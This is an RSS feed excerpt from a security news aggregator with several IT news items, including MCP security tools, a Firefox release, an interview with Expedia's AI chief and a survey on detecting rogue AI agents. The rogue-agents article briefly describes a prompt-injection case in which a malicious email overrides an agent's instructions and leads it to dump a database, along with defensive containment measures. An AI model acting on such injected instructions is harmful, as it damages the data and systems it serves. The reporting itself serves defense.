<li><strong>Laufzeitschutz.</strong> KI-Agenten kommunizieren mit MCP-Servern in natürlicher Sprache. MCP-Sicherheits-Tools sollten deshalb in der Lage sein, diese Kommunikation auf Sicherheitsprobleme wie Prompt Injections hin zu überwachen.</li>



<li><strong>Authentifizierungs- und Zugriffskontrollen.</strong> Das MCP-Protokoll unterstützt inzwischen OAuth, aber das ist nur ein erster Schritt. Für zusätzliche Sicherheit empfehlen sich Tools mit integrierten Kontroll-Frameworks für Zero Trust und Least Privilege.</li>



<li><strong>Logging und Observability.</strong> Tools und Plattformen sollten zudem die Möglichkeit bieten, MCP-Protokolle zu sammeln, Sicherheitsteams über Richtlinienverstöße zu informieren, Compliance-Daten zu erfassen oder Protokolle in die bestehende Sicherheitsinfrastruktur einzuspeisen.</li>
</ul>



<h2 class="wp-block-heading">MCP-Security-Angebote</h2>



<p class="wp-block-paragraph">Im Folgenden haben wir die Anbieter von MCP-Security-Tools in drei Kategorien aufgeteilt. Diese Aufstellung erhebt keinen Anspruch auf Vollständigkeit.</p>



<p class="wp-block-paragraph"><strong>Hyperscaler</strong></p>



<p class="wp-block-paragraph">Für Unternehmen, die sich vollständig auf eine bestimmte Cloud-Plattform verlassen, bieten die MCP-Tools des jeweiligen Hyperscalers einen einfachen Einstieg.</p>



<ul class="wp-block-list">
<li><strong>Amazon Web Services (AWS)</strong> hat Mitte 2025 seine eigene agentenbasierte KI-Plattform eingeführt. <a href="https://aws.amazon.com/de/bedrock/agentcore/" target="_blank" rel="noreferrer noopener">Amazon Bedrock AgentCore</a> umfasst ein Gateway, das mehrere Protokolle unterstützt (darunter auch MCP), ein Identity-Management-System sowie Observability.</li>



<li><strong>Microsoft</strong> bietet einen grundlegenden <a href="https://learn.microsoft.com/de-de/azure/developer/azure-mcp-server/overview" target="_blank" rel="noreferrer noopener">Azure-MCP-Server</a> an, inklusive Support für Azure Key Vault. Darüber hinaus unterstützen auch Azure AI Foundry Agent Service und Azure API Management das Model Context Protocol. Zudem bietet Microsoft mit dem <a href="https://learn.microsoft.com/de-de/agent-framework/overview/agent-framework-overview" target="_blank" rel="noreferrer noopener">Agent Framework</a> auch ein Open-Source-Entwicklungskit, das sowohl MCP als auch Agent2Agent unterstützt und beispielsweise Schutz vor Prompt Injections verspricht.</li>



<li><strong>Google Cloud</strong> kündigte Anfang 2025 seine <a href="https://cloud.google.com/blog/products/ai-machine-learning/mcp-toolbox-for-databases-now-supports-model-context-protocol?hl=en" target="_blank" rel="noreferrer noopener">MCP Toolbox für Datenbanken</a> an – inklusive integrierter Authentifizierung und Observability. Außerdem hat der Hyperscaler auch <a href="https://cloud.google.com/blog/products/identity-security/how-to-secure-your-remote-mcp-server-on-google-cloud?hl=en" target="_blank" rel="noreferrer noopener">eine Referenzarchitektur</a> veröffentlicht, um MCP-Server auf seiner Cloud-Plattform abzusichern.</li>
</ul>



<p class="wp-block-paragraph"><strong>Große Plattformanbieter</strong></p>



<ul class="wp-block-list">
<li>Der IT-Dienstleister <strong>Cloudflare</strong> hat mit <a href="https://blog.cloudflare.com/zero-trust-mcp-server-portals/" target="_blank" rel="noreferrer noopener">MCP Server Portals</a> ein Tool veröffentlicht, mit dem Unternehmen MCP-Verbindungen zentralisiert absichern und überwachen können. Die Funktion ist Bestandteil der Cloudflare-One-Plattform.</li>



<li><strong>Palo Alto Networks</strong> hat mit Blick auf MCP-Sicherheit mehrere Eisen im Feuer. Mit <a href="https://www.paloaltonetworks.com/blog/2025/06/securing-ai-agent-innovation-prisma-airs-mcp-server/" target="_blank" rel="noreferrer noopener">Prisma AIRS</a> hat das Unternehmen einen eigenen, intermediären MCP-Server veröffentlicht. Dieser sitzt zwischen den KI-Agenten und dem eigentlichen MCP-Server und erkennt schadhafte Inhalte und Daten. Das Tool <a href="https://www.paloaltonetworks.com/blog/2025/06/cloud-security-model-context-protocol-mcp-security/" target="_blank" rel="noreferrer noopener">MCP Security</a> ist hingegen Bestandteil von Cortex Cloud WAAS und überprüft die MCP-Kommunikation an der Netzwerkgrenze auf bösartige Aktivitäten.</li>



<li><strong>SentinelOne</strong> gewährt mit seiner <a href="https://www.sentinelone.com/blog/avoiding-mcp-mania-how-to-secure-the-next-frontier-of-ai/" target="_blank" rel="noreferrer noopener">Singularity Platform</a> ebenfalls Einblick in die MCP-Interaktionskette und bietet zum Beispiel Warnmeldungen und automatisierte Incident Response für MCP-Server auf lokaler oder Remote-Ebene.</li>



<li>Die <a href="https://acuvity.ai/" target="_blank" rel="noreferrer noopener">Plattform</a> von <strong>Acuvity</strong> (seit Februar 2026 Teil von <strong>Proofpoint</strong>) verspricht, MCP-Server umfassend abzusichern. Dafür sorgt laut dem Anbieter eine Kombination aus Least-Privilege-Execution, unveränderlichen Laufzeiten, kontinuierlichen Schwachstellenscans, Authentifizierung und Bedrohungserkennung.</li>



<li>Daneben hat auch <strong>Broadcom</strong> MCP-Sicherheitsfunktionen für VMware Cloud Foundation <a href="https://www.broadcom.com/company/news/product-releases/63401" target="_blank" rel="noreferrer noopener">angekündigt</a>, die künftig mehr Sicherheit für agentenbasierte Workflows gewährleisten sollen.</li>
</ul>



<p class="wp-block-paragraph"><strong>Startups</strong></p>



<ul class="wp-block-list">
<li>Das API-Security-Startup <strong>Akto</strong> hat eine <a href="https://www.akto.io/mcp-security" target="_blank" rel="noreferrer noopener">MCP-Security-Plattform</a> im Angebot. Sie umfasst ein Discovery Tool, um MCP-Server in Unternehmensumgebungen zu identifizieren, Security-Testing-Werkzeuge sowie Monitoring- und Threat-Detection-Funktionen.</li>



<li><strong>Invariant Labs</strong> bietet mit <a href="https://github.com/invariantlabs-ai/mcp-scan" target="_blank" rel="noreferrer noopener">MCP-Scan</a> ein quelloffenes Tool, das die statische Analyse und Echtzeitüberwachung von MCP-Servern ermöglicht. Mit <a href="https://invariantlabs.ai/blog/guardrails" target="_blank" rel="noreferrer noopener">Guardrails</a> hat das Startup auch ein kommerzielles Produkt im Angebot. Dabei handelt es sich um einen Proxy. Der zwischen KI-Agenten und MCP-Servern sitzt und vor Security-Risiken schützen soll. Das Tool befähigt Anwender außerdem dazu, Richtlinien aufzusetzen.</li>



<li><strong>Highflame </strong>(vormals Javelin) <a href="https://www.highflame.com/" target="_blank" rel="noreferrer noopener">addressiert</a> ebenfalls das Thema MCP-Sicherheit. Etwa mit Funktionen wie MCP-Server auf Risiken zu scannen oder Datenanfragen zu überprüfen.  </li>



<li><strong>Lasso Security</strong> stellt ein Open-Source-<a href="https://github.com/lasso-security/mcp-gateway" target="_blank" rel="noreferrer noopener">MCP-Gateway</a> zur Verfügung, das die Konfiguration und das Lebenszyklusmanagement von MCP-Servern ermöglicht und Messages um sensible Informationen bereinigt.</li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.csoonline.com/article/4087656/what-cisos-need-to-know-about-new-tools-for-securing-mcp-servers.html" target="_blank">im Original</a> bei unser Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 153 Released]]></title>
<description><![CDATA[Longtime Slashdot reader williamyf writes: FireFox 153 was released today. The most important user-facing changes are improvements to PDF handling (you can now merge PDFs and add images to them), and HDR video playback (on Windows, provided HDR is active systemwide). Other under-the-hood changes ...]]></description>
<link>https://tsecurity.de/de/3684870/it-security-nachrichten/firefox-153-released/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684870/it-security-nachrichten/firefox-153-released/</guid>
<pubDate>Tue, 21 Jul 2026 23:13:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Longtime Slashdot reader williamyf writes: FireFox 153 was released today. The most important user-facing changes are improvements to PDF handling (you can now merge PDFs and add images to them), and HDR video playback (on Windows, provided HDR is active systemwide). Other under-the-hood changes include browser-wide containers and QWAC support. The full list is in the change notes.

 But the most important feature is that this version is an ESR and, therefore, defines the ESR feature set for the next year. Why is being an ESR so important, you ask?

 1.) ESR, rather than "normal" (a.k.a. Rapid Release), Firefox is the out-of-the-box browser for many important distros, including Debian, RHEL, Kali, Tails, SUSE Linux Enterprise, Slackware, and others.

 2.) Many organizations, large and small, standardize on Firefox ESR as their default browser, regardless of the default browser included with their OS.

 3.) Firefox ESR is the basis for many downstream projects, such as Waterfox and KaiOS. All these projects will inherit, for a year, whatever ESR brings to the table today.

 4.) Many ISVs and SaaS providers, if they certify their wares for Firefox at all, certify for the ESR version only.

 Please note that ESR 153 will not be offered as an automatic update until two months from now (ESR 140 will still be supported). If you want it now, you will need to download and install it manually.

 Also of note, ESR 115 will be supported until March 2027. If you use an unsupported version of macOS or Windows (like Windows 7 or 8.x), this is the version to get. However, even Mozilla cautions against running a supported browser on an unsupported OS: "Note that Microsoft ended official support for Windows 7, 8, and 8.1 in January 2023. Unsupported operating systems receive no security updates and have known vulnerabilities. Without official support from Microsoft, maintaining Firefox for outdated operating systems becomes costly for Mozilla and risky for users."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Firefox+153+Released%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F21%2F2022247%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F21%2F2022247%2Ffirefox-153-released%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/21/2022247/firefox-153-released?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Evals are the new PRD, Expedia’s AI chief tells VB Transform 2026]]></title>
<description><![CDATA[“The new PRD are the evals,” Xavi Amatriain, Expedia Group’s first chief AI and data officer, told the VB Transform 2026 audience last week in Menlo Park. “So basically, you encode what you want the product to do through your evals, which might include red teaming evals and all kinds of other thi...]]></description>
<link>https://tsecurity.de/de/3684604/it-nachrichten/evals-are-the-new-prd-expedias-ai-chief-tells-vb-transform-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684604/it-nachrichten/evals-are-the-new-prd-expedias-ai-chief-tells-vb-transform-2026/</guid>
<pubDate>Tue, 21 Jul 2026 20:19:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>“The new PRD are the evals,” Xavi Amatriain, <a href="https://www.expediagroup.com/en-us">Expedia Group’s</a> first chief AI and data officer, told the <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a> audience last week in Menlo Park. “So basically, you encode what you want the product to do through your evals, which might include red teaming evals and all kinds of other things, which already have a bunch of security requirements. So, you already embed that into the PRD and the product design document before you even start coding.”</p><p>He pushed it further. “With AI-assisted or AI-generated code, that’s gonna be the future. It’s like all your thinking is gonna go into the evals.”</p><p>Amatriain served as VP of AI and Compute Enablement at Google across the platforms powering Gemini and Google Search before his December 2025 appointment at Expedia. He's mentored talent who went on to found Perplexity and Scale AI. </p><p>VentureBeat’s <a href="https://venturebeat.com/orchestration/enterprise-ai-is-entering-an-evaluation-gap-agents-are-gaining-autonomy-faster-than-companies-can-verify-them">VB Pulse research on the evaluation gap</a> reinforced the stakes. Sixty-six percent of the 157 enterprises surveyed already permit some production deployment without human review or are building toward it within the next 12 months, yet only 5% fully trust the automated evaluations that would make that decision. Half have shipped an agent that passed internal evals but then failed with a real customer.</p><h2><b>Don’t let guardrails get in the way of feedback</b></h2><p>“The more guardrails and artificial business rules and sort of rules that you put into the system, the worse off,” Amatriain said. “Not only because they’re brittle, but also because they actually mess up with the feedback loop. You are actually biasing the user and the feedback you get from the user, and then you’re learning that in the wrong way.” He called guardrails “a necessary evil” and said the goal is to minimize their impact over time.</p><p>Not everyone at Transform agreed. Other speakers argued during the event that the highest-risk actions still demand very firm guardrails.</p><p>Expedia governs AI through three layers instead. Principles come first, communicated broadly. “I like to encode at a very high level how I expect decisions to be made, because in a large organization you’re gonna have a lot of distributed decision making,” Amatriain said. “And sometimes, if you’re lucky enough, those principles might be embedded in your culture. But most of the time, my experience has been they’re not.” The processes and tools that enforce them follow. “Principles look really nice on a picture on some wall, but you need to then give them teeth,” he said. Automation sits on top of both.</p><p>In practice, this plays out through what Expedia calls agent release toll gates, checkpoints calibrated to risk. “Governance needs to correlate to the risk,” Amatriain said. “And if you have something that is low risk, you don’t need too much governance to get in the way. But if there’s a lot of risk, then you need more governance. That can be encoded.” The toll gates tie evaluation rounds, red teaming, and security review to each agent’s risk level, and <a href="https://venturebeat.com/orchestration/what-billions-of-ai-predictions-taught-expedia-before-the-age-of-ai-agents">the checks shift from recommended to required as the stakes climb</a>. </p><h2>Specialized agents over monolithic intelligence</h2><p>“Even when I was at Google, I was like, I don’t believe in AGI as sort of like a singleton and a unified sort of like single model,” Amatriain told the audience. “I think it’s much better to think of it as composition, sort of like having specialized agents that are very good at some task and then composing the system out of those specialized agents.”</p><p>Expedia’s architecture starts at the component level. Tools compose into skills, skills assemble into sub-agents, and sub-agents get orchestrated into the full agentic system. “You need to have those principles that are unified that talk about things like what is the tone that we’re using, how are we addressing the user, how are we passing context, memory,” he said. “All of that needs to be thoroughly designed.” He framed this as a systemic design problem. “It’s not about the model, it’s not about a specific solution, it’s about how you’re designing the system.”</p><p>Amatriain argued that scoping each agent narrowly also makes the system easier to secure, since teams can evaluate and lock down individual agents in isolation before composing them.</p><h2>When the user must keep the final click</h2><p>Travel pricing changes in real time, flight availability shifts minute to minute, and hotel reviews routinely contradict what suppliers claim. Amatriain described a system that blends retrieval-augmented generation with direct API tool calls, choosing the approach based on latency. “If the user asks you a question like, how much does a four star hotel usually cost in Chicago in July, you don’t expect the agent to take two minutes to answer that question,” he said. “You expect an immediate answer because that answer can be cached and it doesn’t need real-time information.” A pet-friendly four-star near Lake Michigan with a pool might justify a 30-second reasoning window.</p><p>“The supplier might be saying, yeah, we have a great swimming pool, but then we also have the reviews from the travelers and we actually see there’s two reviews that say the swimming pool was not great or was not open after 6 p.m.,” Amatriain explained. A generic chatbot, he added, would only surface what a supplier self-reports, while Expedia cross-references against its own review corpus.</p><p>“We don’t want the agent to book the hotel or to buy you a plane ticket for you,” Amatriain said. “That’s something that the user has to have the agency. And the agent can recommend, can suggest, can discuss with you, but you’re gonna have to hit that click. And that’s non-negotiable.” That constraint, he argued, is also a security decision. “Once you establish those design principles, you also don’t need the guardrail because otherwise you’re gonna have to put all those guardrails in after the fact.”</p><h2>The next attackers will be other AI systems</h2><p>“Security needs to be a principle that is shifted as left as possible and as part of the design itself,” Amatriain said in response to an audience question. “And usually when you need a guardrail is because you’ve not thought about it early on.”</p><p>A second audience member pressed for lessons learned from production. Amatriain described a feedback loop where monitoring signals flow back into the eval suite. “You can almost automate the whole cycle,” he said. “But having that whole feedback loop from real signals, from your operating AI system, all the way into being reported and fixed as quickly as possible is going to become essential.”</p><p>Amatriain's toll gates are a bet that governance calibrated to risk can stay ahead of that feedback loop. VentureBeat’s separate June <a href="https://venturebeat.com/security/shared-api-keys-expose-ai-agent-fleets-venturebeat-research">Pulse survey on agent security</a>, drawn from 107 enterprises, shows how thin that margin is. More than half, 54 percent, have already had an agent security incident or near-miss. Fifty-nine percent plan to adopt, add, or replace agent security tooling within 12 months, and 29% plan to move this quarter. Incident rates climb with organization size, reaching 63% among enterprises with more than 1,000 employees versus 49% for companies with 101 to 1,000. And sandbox isolation, the one post-breach control that limits damage, drops from 35% adoption at the smaller companies to just 20 percent at the largest.</p><p>Amatriain warned that threats will increasingly come from other AI systems. “You’re gonna get threats coming not only from humans but also from other external agentic systems that are really powerful, and they’re gonna be poking at everything you’re doing. And as soon as you detect something, it’s not only about the detection, but the time to fix becomes essential here.”</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple to launch ‘Apple Upgrade’ device leasing program with Klarna on July 28th]]></title>
<description><![CDATA[Apple is set to roll out a major new device financing program called "Apple Upgrade," partnering with Swedish fintech Klarna Group Plc, in a…
The post Apple to launch ‘Apple Upgrade’ device leasing program with Klarna on July 28th appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3684386/ios-mac-os/apple-to-launch-apple-upgrade-device-leasing-program-with-klarna-on-july-28th/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684386/ios-mac-os/apple-to-launch-apple-upgrade-device-leasing-program-with-klarna-on-july-28th/</guid>
<pubDate>Tue, 21 Jul 2026 18:42:18 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple is set to roll out a major new device financing program called "Apple Upgrade," partnering with Swedish fintech Klarna Group Plc, in a…</p>
<p>The post <a href="https://macdailynews.com/2026/07/21/apple-to-launch-apple-upgrade-device-leasing-program-with-klarna-on-july-28th/">Apple to launch ‘Apple Upgrade’ device leasing program with Klarna on July 28th</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KeeperPAM strengthens privileged access management for global construction SaaS provider Asite]]></title>
<description><![CDATA[Keeper Security has announced that UK-based construction technology provider Asite has deployed KeeperPAM® to strengthen privileged access management, secrets governance and credential security across its global operations. The deployment, detailed in a newly published customer case study, sees A...]]></description>
<link>https://tsecurity.de/de/3684134/it-security-nachrichten/keeperpam-strengthens-privileged-access-management-for-global-construction-saas-provider-asite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684134/it-security-nachrichten/keeperpam-strengthens-privileged-access-management-for-global-construction-saas-provider-asite/</guid>
<pubDate>Tue, 21 Jul 2026 17:09:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Keeper Security has announced that UK-based construction technology provider Asite has deployed KeeperPAM® to strengthen privileged access management, secrets governance and credential security across its global operations. The deployment, detailed in a newly published customer case study, sees Asite replace a collection of legacy privileged access and secrets management tools with Keeper’s unified, cloud-native platform […]</p>
<p>The post <a href="https://www.itsecurityguru.org/2026/07/21/keeperpam-strengthens-privileged-access-management-for-global-construction-saas-provider-asite/">KeeperPAM strengthens privileged access management for global construction SaaS provider Asite</a> appeared first on <a href="https://www.itsecurityguru.org/">IT Security Guru</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KeeperPAM strengthens privileged access management for global construction SaaS provider Asite]]></title>
<description><![CDATA[Keeper Security has announced that UK-based construction technology provider Asite has deployed KeeperPAM® to strengthen privileged access management, secrets governance and credential security across its global operations. The deployment, detailed in a newly published customer case study, sees A...]]></description>
<link>https://tsecurity.de/de/3684129/it-security-nachrichten/keeperpam-strengthens-privileged-access-management-for-global-construction-saas-provider-asite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684129/it-security-nachrichten/keeperpam-strengthens-privileged-access-management-for-global-construction-saas-provider-asite/</guid>
<pubDate>Tue, 21 Jul 2026 17:08:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Keeper Security has announced that UK-based construction technology provider Asite has deployed KeeperPAM® to strengthen privileged access management, secrets governance and credential security across its global operations. The deployment, detailed in a newly published customer case study, sees Asite replace…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/keeperpam-strengthens-privileged-access-management-for-global-construction-saas-provider-asite/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/keeperpam-strengthens-privileged-access-management-for-global-construction-saas-provider-asite/">KeeperPAM strengthens privileged access management for global construction SaaS provider Asite</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT leaders confident but cooked when it comes to rogue AI agents]]></title>
<description><![CDATA[A large majority of IT and security leaders are confident in their teams’ ability to detect when an AI agent has gone rogue, but few are able to take quick action to mitigate the fallout when an agent exceeds its intended scope.



Nine in 10 IT and security leaders surveyed by IT observability v...]]></description>
<link>https://tsecurity.de/de/3683326/it-security-nachrichten/it-leaders-confident-but-cooked-when-it-comes-to-rogue-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683326/it-security-nachrichten/it-leaders-confident-but-cooked-when-it-comes-to-rogue-ai-agents/</guid>
<pubDate>Tue, 21 Jul 2026 12:09:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A large majority of IT and security leaders are confident in their teams’ ability to detect when an AI agent has gone rogue, but few are able to take quick action to mitigate the fallout when an agent exceeds its intended scope.</p>



<p class="wp-block-paragraph">Nine in 10 IT and security leaders surveyed by <a href="https://www.cio.com/article/4176067/the-ai-governance-imperative-you-cant-afford-to-ignore.html?utm=hybrid_search">IT observability</a> vendor WanAware believe in their capabilities to find malfunctioning agents, but only 26% acknowledge that they can trace the downstream impact within minutes. Over 45% say it would take hours to understand the full impact of an agent incident.</p>



<p class="wp-block-paragraph">That delay between detection and mitigation can be a huge problem, says <a href="https://www.linkedin.com/in/jmcollins/">Jeffrey Collins</a>, WanAware’s CEO. The survey suggests IT leaders are overconfident about their ability to control agents, he adds.</p>



<p class="wp-block-paragraph">And here, timing is critical, Collins says, given that malfunctioning agents can lead to major outages and data breaches — damage that can start within seconds, he notes.</p>



<p class="wp-block-paragraph">“That’s truly the gap here. It’s not if you understand it; it’s when you understand it,” Collins says. “If your average time to just knowing about an event is measured in days, weeks, or months, you have a serious problem right now.”</p>



<p class="wp-block-paragraph">While it’s not always easy to tell whether an agent has gone beyond its scope, it’s even harder to tell the downstream impacts, he adds.</p>



<p class="wp-block-paragraph">“What’s been affected if one machine was compromised, either from our own AI usage as a customer or from someone else’s, what else could happen, and how can we understand that quickly?” Collins asks.</p>



<h2 class="wp-block-heading">Machine speed</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/kevin-paige-578547a/">Kevin Paige</a>, field CISO at IT solutions provider C1, agrees that time is of the essence when an AI agent malfunctions.</p>



<p class="wp-block-paragraph">“The problem is that agents move at machine speed, so the gap between an agent malfunctioning and you catching it isn’t measured in minutes, it’s measured in actions,” he says. “Every minute it’s wrong it’s still working, and because it’s usually running on borrowed standing credentials, the damage spreads across everything those credentials can reach before anyone can pin it on the agent.”</p>



<p class="wp-block-paragraph">In many cases, organizations with rogue agents don’t find out from their <a href="https://www.cio.com/article/4195251/19-agentops-tools-for-monitoring-ai-activity-issues-and-costs.html">own detection tools</a>, but from customers, auditors, or broken downstream systems, he says.</p>



<p class="wp-block-paragraph">“That’s the worst way to learn,” Paige adds. “The longer-term cost is trust, because one incident like that and the business pulls back on agents entirely, so failing to contain a malfunction fast is also what stalls adoption.”</p>



<p class="wp-block-paragraph">The problem with detecting <a href="https://www.cio.com/article/4127774/1-5-million-ai-agents-are-at-risk-of-going-rogue-2.html?utm=hybrid_search">rogue agents</a> is that many organizations have built in visibility but not control, he says.</p>



<p class="wp-block-paragraph">“When an agent goes out of scope it’s rarely dramatic,” Paige adds. “Usually, it’s using access it legitimately has, for a purpose nobody signed off on, which means your access model doesn’t even flag it. So you find out after the fact, and you fix it by hand.”</p>



<p class="wp-block-paragraph">IT teams can stop agents that exceed their scope, but only if controls were built in before the agent was deployed, adds <a href="https://www.linkedin.com/in/chrisdcamacho/">Chris Camacho</a>, COO of Abstract Security.</p>



<p class="wp-block-paragraph">“Every agent should have its own identity, narrowly scoped permissions, and a complete audit trail,” he says. “Just as important, organizations need the ability to immediately revoke that identity or suspend the agent without manually hunting through multiple consoles during an incident.”</p>



<p class="wp-block-paragraph">Part of the challenge is that an agent’s activity is spread across identities, cloud platforms, SaaS applications, APIs, and security tools that were not designed to tell a complete story, Camacho says. Security teams often have to piece together events from multiple basic questions such as, what did the agent access, and what changed?</p>



<p class="wp-block-paragraph">“Most organizations know where they’ve deployed AI agents,” he adds. “That’s very different from knowing exactly what an agent did after something unexpected happens.”</p>



<p class="wp-block-paragraph">The organizations that most successfully manage agents won’t be the ones that deploy the most, he says. “They’ll be the ones that can explain every action an agent took, prove it operated within policy, and stop it immediately when it doesn’t,” he adds.</p>



<h2 class="wp-block-heading">Confidence isn’t reality</h2>



<p class="wp-block-paragraph">The survey’s results make sense to <a href="https://www.linkedin.com/in/brinkleyjoseph/">Joe Brinkley</a>, director of offensive security research and community at pentest firm Cobalt. The high confidence in detecting malfunctions is compliance paperwork, whereas the minority of respondents who can detect problems quickly is the reality on the ground, he says.</p>



<p class="wp-block-paragraph">“Tracing agent impact fast is brutal,” Brinkley says. “These systems do not run on fixed code paths. They use nondeterministic reasoning across a web of different APIs. Traditional logs only catch isolated events. They completely miss the full execution chain.”</p>



<p class="wp-block-paragraph">By the time an anomaly alert hits, an agent has already executed multiple downstream actions, he adds.</p>



<p class="wp-block-paragraph">In some cases, agent malfunctions are related to data flow vulnerabilities, such as when a prompt injection from an untrusted input such as a malicious email overwrites the system instructions, he says.</p>



<p class="wp-block-paragraph">“We need to be clear about the actual technology; the AI is not waking up angry,” Brinkley says. “The agent suddenly thinks its official job is to dump your database. It spends tokens as fast as possible to do that.”</p>



<p class="wp-block-paragraph">Agents are also vulnerable to loop failures, when they hit API errors and try to self-correct, he adds.</p>



<p class="wp-block-paragraph">“It hits that same broken endpoint 10,000 times in two minutes,” he says. “It drains your budget and causes a self-inflicted denial of service. It is an automated wrecking ball moving faster than your monitoring can log it.”</p>



<p class="wp-block-paragraph">Brinkley recommends that IT leaders put “hard kill” switches at the API layer to stop agents going out of scope.</p>



<p class="wp-block-paragraph">“You can stop it, but soft guardrails are useless,” he says. “Do not try to patch the prompt or filter the text. You have to treat the agent like a compromised user account. Pull the OAuth tokens and kill the access immediately.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI is re-designing data center architecture]]></title>
<description><![CDATA[While organizations are racing to roll out AI at scale, the data center industry is discovering that not all workloads have the same infrastructure requirements.]]></description>
<link>https://tsecurity.de/de/3683304/it-nachrichten/why-ai-is-re-designing-data-center-architecture/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683304/it-nachrichten/why-ai-is-re-designing-data-center-architecture/</guid>
<pubDate>Tue, 21 Jul 2026 12:03:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[While organizations are racing to roll out AI at scale, the data center industry is discovering that not all workloads have the same infrastructure requirements.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI is rewriting the rules of team structure in SaaS]]></title>
<description><![CDATA[AI is shifting SaaS from heavyweight structures to faster, more autonomous, decision-driven teams.]]></description>
<link>https://tsecurity.de/de/3683195/it-nachrichten/why-ai-is-rewriting-the-rules-of-team-structure-in-saas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683195/it-nachrichten/why-ai-is-rewriting-the-rules-of-team-structure-in-saas/</guid>
<pubDate>Tue, 21 Jul 2026 11:33:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI is shifting SaaS from heavyweight structures to faster, more autonomous, decision-driven teams.]]></content:encoded>
</item>
<item>
<title><![CDATA[SaaS will survive, but lazy SaaS is dead]]></title>
<description><![CDATA[Something interesting happened during an internal evaluation of AI meeting transcription tools at Tungsten Automation. The products worked. They weren’t bad. But sitting across from the pricing, we kept asking the same question: what exactly are we paying for? 



We already had a secure enterpri...]]></description>
<link>https://tsecurity.de/de/3683122/ai-nachrichten/saas-will-survive-but-lazy-saas-is-dead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683122/ai-nachrichten/saas-will-survive-but-lazy-saas-is-dead/</guid>
<pubDate>Tue, 21 Jul 2026 11:05:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Something interesting happened during an internal evaluation of AI meeting transcription tools at Tungsten Automation. The products worked. They weren’t bad. But sitting across from the pricing, we kept asking the same question: what exactly are we paying for? </p>



<p class="wp-block-paragraph">We already had a secure enterprise AI environment. Building a meeting summary workflow took days, not months. We customized the outputs, injected our own internal context, and controlled security our way instead of working around someone else’s roadmap. We built it. It works better. We own it.</p>



<p class="wp-block-paragraph">That’s not a knock on those vendors. It’s a signal of something more fundamental happening across enterprise software.</p>



<h2 class="wp-block-heading">The moat was never the product</h2>



<p class="wp-block-paragraph">For two decades, <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html" data-type="link" data-id="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">SaaS</a> rode a favorable asymmetry: building internal tools was hard, integrations were messy, and even modest automation required developers and long timelines. Buying was faster and cheaper than building. That asymmetry fueled the explosion of SaaS into every corner of the enterprise stack.</p>



